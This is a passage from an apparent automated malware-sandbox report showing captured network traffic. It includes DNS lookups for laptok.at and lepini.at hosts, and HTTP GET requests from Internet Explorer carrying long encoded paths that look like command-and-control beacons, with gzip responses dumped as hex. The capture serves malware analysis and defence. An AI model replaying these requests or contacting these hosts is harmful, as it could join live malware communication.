                                                                                                                                            Nov 20, 2020 13:33:46.476891994 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476900101 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476931095 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476943970 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476979017 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477008104 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.477021933 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477022886 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.477060080 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477097988 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477135897 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477173090 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477174044 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.477200031 CET4973180192.168.2.347.241.19.44

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 20, 2020 13:33:13.831291914 CET5836153192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:13.858442068 CET53583618.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:16.928622961 CET6349253192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:16.955749989 CET53634928.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:18.182957888 CET6083153192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:18.210057974 CET53608318.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:19.253458023 CET6010053192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:19.280782938 CET53601008.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:20.061245918 CET5319553192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:20.088474035 CET53531958.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:20.860735893 CET5014153192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:20.887850046 CET53501418.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:21.685347080 CET5302353192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:21.712531090 CET53530238.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:22.521199942 CET4956353192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:22.548346043 CET53495638.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:23.296860933 CET5135253192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:23.324100971 CET53513528.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:24.942857981 CET5934953192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:24.969974995 CET53593498.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:25.810091972 CET5708453192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:25.837268114 CET53570848.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:39.228127003 CET5882353192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:39.255470037 CET53588238.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:40.181142092 CET5756853192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:40.208467007 CET53575688.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:41.000368118 CET5054053192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:41.028100967 CET53505408.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:43.571583033 CET5436653192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:43.608565092 CET53543668.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:44.615875959 CET5303453192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:44.660775900 CET53530348.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:44.679397106 CET5776253192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:44.715097904 CET53577628.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:48.288885117 CET5543553192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:48.315965891 CET53554358.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:48.894037008 CET5071353192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:48.929748058 CET53507138.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:52.509083986 CET5613253192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:52.537138939 CET53561328.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:55.127355099 CET5898753192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:55.162821054 CET53589878.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:56.573421955 CET5657953192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:33:56.609309912 CET53565798.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:02.306252956 CET6063353192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:02.333309889 CET53606338.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:03.142594099 CET6129253192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:03.182229996 CET53612928.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:05.689238071 CET6361953192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:05.716586113 CET53636198.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:10.795291901 CET6493853192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:10.831927061 CET53649388.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:13.551425934 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:13.587361097 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:14.542453051 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:14.580282927 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:15.558326006 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:15.596432924 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:17.573200941 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:17.600239992 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:21.592626095 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:21.638942957 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:41.898040056 CET6491053192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:41.933887005 CET53649108.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:44.676477909 CET5212353192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:44.703452110 CET53521238.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:45.133925915 CET5613053192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:45.169461012 CET53561308.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:45.174135923 CET5633853192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:45.201183081 CET53563388.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:45.617145061 CET5942053192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:45.644351959 CET53594208.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:34:46.772273064 CET5878453192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:34:46.810003996 CET53587848.8.8.8192.168.2.3
                                                                                                                                            Nov 20, 2020 13:35:03.369529009 CET6397853192.168.2.38.8.8.8
                                                                                                                                            Nov 20, 2020 13:35:03.396821022 CET53639788.8.8.8192.168.2.3

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                            Nov 20, 2020 13:33:44.679397106 CET192.168.2.38.8.8.80xbdb4Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:33:48.894037008 CET192.168.2.38.8.8.80xe1a7Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:33:55.127355099 CET192.168.2.38.8.8.80x3d08Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:41.898040056 CET192.168.2.38.8.8.80xd102Standard query (0)c56.lepini.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:44.676477909 CET192.168.2.38.8.8.80x7ce6Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:45.133925915 CET192.168.2.38.8.8.80x8588Standard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:46.772273064 CET192.168.2.38.8.8.80x1c76Standard query (0)api3.lepini.atA (IP address)IN (0x0001)

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                            Nov 20, 2020 13:33:44.715097904 CET8.8.8.8192.168.2.30xbdb4No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:33:48.929748058 CET8.8.8.8192.168.2.30xe1a7No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:33:55.162821054 CET8.8.8.8192.168.2.30x3d08No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:41.933887005 CET8.8.8.8192.168.2.30xd102No error (0)c56.lepini.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:44.703452110 CET8.8.8.8192.168.2.30x7ce6No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:45.169461012 CET8.8.8.8192.168.2.30x8588No error (0)api3.lepini.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 20, 2020 13:34:46.810003996 CET8.8.8.8192.168.2.30x1c76No error (0)api3.lepini.at47.241.19.44A (IP address)IN (0x0001)

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • api10.laptok.at
                                                                                                                                            • c56.lepini.at
                                                                                                                                            • api3.lepini.at

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.34973147.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:33:44.982534885 CET240OUTGET /api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x HTTP/1.1
                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                            Accept-Language: en-US
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 20, 2020 13:33:45.971455097 CET242INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:33:45 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 6e ec 40 10 45 3f c8 0b 33 2d cd cc ec 9d 71 cc cc 5f ff f2 a4 28 8a 94 4c c6 ee ae aa 7b 8e a7 73 8e 1f 25 9c 00 53 49 e5 26 0d 27 5f 16 a3 50 98 10 60 e6 36 9e 39 15 17 5d 05 6b 9d 70 5f 59 26 3e 2a 8a 9e ba b2 f1 6f 1f 14 7a 72 d4 f6 71 67 86 8d aa 37 b1 1a c0 b9 c6 3c f7 e7 df 9c d3 c5 0a a2 d9 2b 76 b5 f0 db a8 76 0d ad 2e db ba ca 83 d1 5f d6 a7 de c0 e2 7d e2 cf 8f 7b 0e 40 a1 15 12 ce cf 9a cb 89 4b 9b e1 ca 6c fa 31 58 ac 4e f9 e8 7e 8c c1 7e fc 98 7e 57 8b c3 b4 a8 2f 45 a9 9b aa 2f b1 46 c9 c6 e4 56 b5 30 ee cd a8 9f f9 a0 c3 3a 34 ed 8e fd 0e d5 7e 78 7b d1 aa 1e a6 19 d3 c4 4f d0 01 76 df 2a e6 74 d5 d1 ad d6 94 38 c5 b5 a2 6d 8c 99 c3 35 2b e4 cd 3a c0 7e 76 e7 2d 08 c4 e3 ac 58 ff 5d b4 12 72 a2 b3 00 0a 7d 9c 26 b5 52 2b d9 28 2a 21 2e 6c 61 5e e7 e1 a0 5a 4c 50 04 2a 3b 8d 76 2d 71 cf 6e d5 62 58 85 08 89 c9 71 71 b4 5f 80 b7 e8 01 25 b1 8c 61 e8 d7 e0 d9 2d e7 3d 2a 94 ac 7a 9c c3 74 98 1a 1f 06 99 2c a2 de 51 e4 32 85 50 db d9 80 0e cc 22 c8 84 25 8e 2f a7 9e 95 61 3d 3f 1a a0 ec 44 9c ab 95 fe 70 db 4f 60 73 d0 89 32 9d f0 42 4a 66 17 be 70 04 7b 2b 12 de fa a6 8e 1f 29 c6 37 87 4f a3 88 4b 62 b4 87 ad e5 bf 1b 34 6f 62 55 32 65 ba 37 d5 01 37 4b 11 b6 54 e2 7b ff 78 35 69 bb 98 3e 93 d7 1f 49 68 0d cb b4 0e ca 9a 13 20 c3 53 80 90 3c b4 58 a0 c6 e0 94 ea 01 30 64 70 9a 95 a0 b0 18 3d 34 c7 c8 85 9c 6d fc 74 e5 ee d4 43 91 bf 76 15 d8 62 4e 6e f1 de 42 fd 88 58 3d b3 8c c6 87 e3 97 58 5a 2e 3d 59 99 3a b4 52 8b 66 b8 79 c2 fd b8 6b d2 b3 69 31 49 27 22 1c 4b b4 70 b0 b6 83 75 a2 ab 56 0c 7e f0 50 0d 5f 67 e2 f6 70 5e 42 14 22 32 01 dd 2b 44 a8 93 3a 50 78 29 46 3c 5b 17 7e 77 81 bb 47 a1 64 12 7e fe a1 c0 77 56 21 48 fc f5 c8 2d b8 d3 9c 4b 57 a0 ab 0d 0f 8b 66 fe 0e 3f 9f 7b 65 3a e0 3c 84 5b 41 33 f8 04 c6 95 3d 2b e5 a6 84 25 ef f9 e5 cb 41 54 98 dc 90 d9 fe 96 d5 10 41 4d 8d f1 bb 55 f1 75 a6 1f e7 3c 56 e3 06 fc 04 e5 d8 f4 6c b1 fb 21 dd cf f1 8e 99 79 78 ac f5 97 b9 03 2d 8c d9 76 0c bd 6b 74 5e 91 30 04 73 a4 1e 5b 78 bf 8f 67 9e 5f 7a bc fe 86 f6 8e a3 ee c5 85 ad 3f af 6b 42 3e a2 fa c8 22 88 67 a4 4e 10 95 49 cf 03 f5 b8 41 d9 ed 75 dd ea 98 05 3d 2d aa 43 8b be d0 f5 63 a6 aa fc 96 cf ba 60 02 fb 8a 92 16 72 cb e0 cc 2b 7d 33 02 bb 66 0b 54 2a 60 4c cd c3 9a a0 cd ea 94 92 79 76 71 51 ea 42 30 30 d5 31 3e 87 78 c1 45 26 75 04 32 d9 17 14 f6 26 08 e3 a5 e1 3e f9 c1 71 43 04 c3 a5 a5 79 3b 75 76 75 a4 29 f7 cc 98 be d1 c4 3b a1 6d 9b 88 9f 38 d3 96 d6 78 75 06 60 1f 86 57 3d 21 64 6c c0 e6 c0 da c3 1e c5 a1 c6 a9 74 bb d3 02 48 e5 bc 88 b8 98 09 5a 3b 80 59 83 8b 32 24 72 b7 21 d6 49 e2 0c 35 75 8e 2a 15 0f 8d 65 92 f6 8d 57 2c 46 98 42 6e 78 69 62 23 86 8a ee eb 25 a3 13 89 e7 f8 36 a3 65 ae 25 25 68 97 ce ec 5f f5 e0 a7 95 89 68 73 b8 a2 0c 68 26 e2 f3 33 a2 7d 45 04 97 d7 48 6c 1b 4b 0d b9 89 2f 83 78 11 6d 47 c4 27 46 bd f6 ef 3a 1d 79 bf 46 6b 7c fa 7e 57 84 53 f9 05 90 77 2f 10 66 c8 e8 22 35 69 b8 e3 b2 9e 49 58 81 dd e1 9d aa 6b 39 bf 63 e5 d0 7b 42 fb db e2 49 97 47 8e b6 d8 cb b7 a2 f9 e8 4a 18 75 2c 03 70 25 8b f7 bb 2a cc 91 79 7d 3e 63 87 97 12 ab 78 ba
                                                                                                                                            Data Ascii: 2000n@E?3-q_(L{s%SI&'_P`69]kp_Y&>*ozrqg7<+vv._}{@Kl1XN~~~W/E/FV0:4~x{Ov*t8m5+:~v-X]r}&R+(*!.la^ZLP*;v-qnbXqq_%a-=*zt,Q2P"%/a=?DpO`s2BJfp{+)7OKb4obU2e77KT{x5i>Ih S<X0dp=4mtCvbNnBX=XZ.=Y:Rfyki1I'"KpuV~P_gp^B"2+D:Px)F<[~wGd~wV!H-KWf?{e:<[A3=+%ATAMUu<Vl!yx-vkt^0s[xg_z?kB>"gNIAu=-Cc`r+}3fT*`LyvqQB001>xE&u2&>qCy;uvu);m8xu`W=!dltHZ;Y2$r!I5u*eW,FBnxib#%6e%%h_hsh&3}EHlK/xmG'F:yFk|~WSw/f"5iIXk9c{BIGJu,p%*y}>cx


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.34973247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:33:47.086637974 CET455OUTGET /favicon.ico HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 20, 2020 13:33:47.847647905 CET455INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:33:47 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            2192.168.2.34973547.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:33:49.214777946 CET469OUTGET /api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 HTTP/1.1
                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                            Accept-Language: en-US
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 20, 2020 13:33:51.999758005 CET471INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:33:49 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 83 40 14 44 17 c4 00 b7 21 ee 10 5c 66 10 dc dd 56 ff f3 4f e6 a1 a1 5f 57 dd 4b d2 dc 00 f6 4e f3 e3 e2 49 06 3f b5 1d 73 97 c5 05 11 f5 cd 87 bb 67 9f 88 a3 fc e7 2e 6c 0d 7a df 51 ed f9 40 a3 ad bb a7 9c 05 16 21 fc dc b4 49 71 8a 80 f6 13 4b 77 ef 04 6e 4f 99 1f b9 60 c3 2a 0f 8f 0d e8 13 83 7e 35 82 02 66 53 fd 49 32 d9 11 d9 a6 48 c3 f4 e6 d1 74 82 2f 36 3e e9 c1 a5 7f 1c 55 6d 9d d4 d9 a8 0b 8a 33 48 07 45 a3 5d 17 8e 61 6c 54 96 9d c9 51 4b 61 09 b6 e1 c1 59 27 ae 33 55 f7 a4 5e 6c 64 46 b0 89 21 4a fb a1 ef ae 7e 87 03 5a 16 85 e4 90 40 0b d5 a3 68 63 3a b3 a5 f3 ca bf 78 61 b6 f4 7a f4 6e 67 86 c0 e8 83 66 ca bd e1 d5 a3 05 75 f0 89 e7 ba 2e 87 15 ce d5 b5 d3 ee 89 4e 69 f0 8b 37 59 d5 b7 67 aa 80 52 9e 84 ed b5 2c 95 be d6 a9 3d 8d 3c 0a 4e 34 53 87 c6 81 dc 09 fa fc ae 01 51 45 36 7d 1c c5 8e 5a fa b5 9a af 03 36 33 f1 d9 f9 60 fa 5e 7c 77 35 03 07 30 9c 8a 1f 53 26 4e 73 9b 22 8f 85 7e 83 a2 11 91 5b 75 5f f9 3e bf df 4b 51 68 21 11 85 3a 9c 85 f4 cc 3e 37 c8 63 49 54 91 f1 9e 09 19 3f 45 70 10 ae 4f 84 95 cc f7 a6 03 32 71 54 d4 5f cf 88 81 64 4c 79 b9 b3 9c 98 b3 8e 0a fa 3a 88 aa bc f5 30 4a 63 88 c3 c8 d2 59 bf b7 da 8a 3d ae aa 0e e4 1b 6f 86 66 8b 40 28 c8 22 40 bb 08 c9 90 9f 00 c1 4a 00 c5 f6 19 c4 4c 7f 5b 61 e5 fb bc d6 28 7d ad 84 dd 42 1e f4 72 29 84 d7 da 67 0e 06 99 a0 8c 58 28 f2 1d 56 e0 67 db 4c e6 4d 93 6c ec cf 55 d9 80 15 da 5a ce f2 b5 f5 ad ed fe 0a 0f e5 93 e9 e4 a4 02 41 e1 e0 45 2f 3f 4f 3d 3a 22 b3 3d 83 76 50 b1 61 a9 bc d0 2c e5 52 fa db b4 55 01 68 09 03 d0 b1 db ee 92 3d 35 01 56 6f e5 1f 82 e4 75 df f4 5b 2e 91 e4 46 82 a3 bc bc 97 eb 21 ed e2 e3 f5 32 fe 6a e5 70 93 f5 f1 5d c1 8b e7 e2 3a 3c 69 41 d2 e7 67 ff a2 ea 8e 50 bb ae 2d 51 bd c6 e2 a8 8c 2d 6b 51 d8 4d 25 b6 70 a4 69 0b da 1f bf 5e 92 2c 3f 7a 65 48 4b 50 ed c4 ad 37 6f 6b 55 6b ca cc 03 02 34 4c 7c 9c a4 19 fa 14 f3 70 ac 64 9f 0f f9 cb 19 40 f8 e9 b4 90 16 ce 9e 61 9b 61 54 f9 38 db 21 bb ec 5c 2d 67 be 72 c6 e5 df 3a d4 c3 a0 e6 d7 c3 60 46 58 62 65 d2 b9 d1 ee f5 63 f6 40 2b 0d e1 04 65 59 c8 11 10 d4 63 a1 e3 17 eb 40 5a 61 22 a6 99 72 8f b4 02 b7 b2 ee ef 8c 62 dc c7 df 86 2e a3 9c 73 f9 1e 54 5e 8e 79 60 e5 8c c3 fb 3b fc 44 19 52 b3 d5 5e c4 eb fd c5 dc e3 98 70 fa b2 8c 4f 11 8b 47 e1 cd 77 73 aa f6 a5 5d cc f1 9b 00 40 c1 5f 0c ca 53 2d c8 89 15 6b 2e 06 0a 85 bb 6f 78 25 d3 ca 2e 64 01 50 11 96 4b b1 2e 36 8e 69 68 23 41 1f c2 26 2a 8a ac c3 e5 32 0c 91 b1 15 ff 2d 8f 98 19 df 83 72 ed 15 30 a9 9d 78 ae 4e f4 ea 26 75 0b 85 4b 44 0b 66 9f 33 52 dc 27 59 05 31 4d a7 e3 be 45 9d 1b 06 e5 64 a5 a4 02 86 55 9a 62 f4 95 26 bc 4d 20 3c e4 8f 0a dc f3 08 32 5d 17 b0 ee 22 73 c4 88 03 0e 21 17 8a 54 fa 90 ee 6a ba 1b 99 8e 89 65 20 05 96 d8 0d d6 a7 06 b6 88 a0 aa b2 6f ef 32 c4 b9 d9 31 ce ad f0 91 64 1d 56 a7 13 e8 ad 6b bf 7e 5b 69 13 ef d1 c8 b8 ab 95 1d d2 25 2c e8 b4 ca ac 93 c3 84 02 72 65 f0 01 5a 34 2a 09 f1 f5 40 d9 a0 81 1d b6 02 ab 97 0c da 33 5e 5a a1 22 7c 33 18 fc 50 05 45 93 2c 26 99 06 7f 2e c7 80 6e ad 23 20 af 51 3e 5b ca 79 aa 99 af af 9d dd 9c 88 4b 31 82 e6 d0 d6
                                                                                                                                            Data Ascii: 2000E@D!\fVO_WKNI?sg.lzQ@!IqKwnO`*~5fSI2Ht/6>Um3HE]alTQKaY'3U^ldF!J~Z@hc:xazngfu.Ni7YgR,=<N4SQE6}Z63`^|w50S&Ns"~[u_>KQh!:>7cIT?EpO2qT_dLy:0JcY=of@("@JL[a(}Br)gX(VgLMlUZAE/?O=:"=vPa,RUh=5Vou[.F!2jp]:<iAgP-Q-kQM%pi^,?zeHKP7okUk4L|pd@aaT8!\-gr:`FXbec@+eYc@Za"rb.sT^y`;DR^pOGws]@_S-k.ox%.dPK.6ih#A&*2-r0xN&uKDf3R'Y1MEdUb&M <2]"s!Tje o21dVk~[i%,reZ4*@3^Z"|3PE,&.n# Q>[yK1


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            3192.168.2.34973447.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 20, 2020 13:33:53.131330967 CET749OUTGET /favicon.ico HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 20, 2020 13:33:53.895561934 CET755INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 20 Nov 2020 12:33:53 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Encoding: gzip
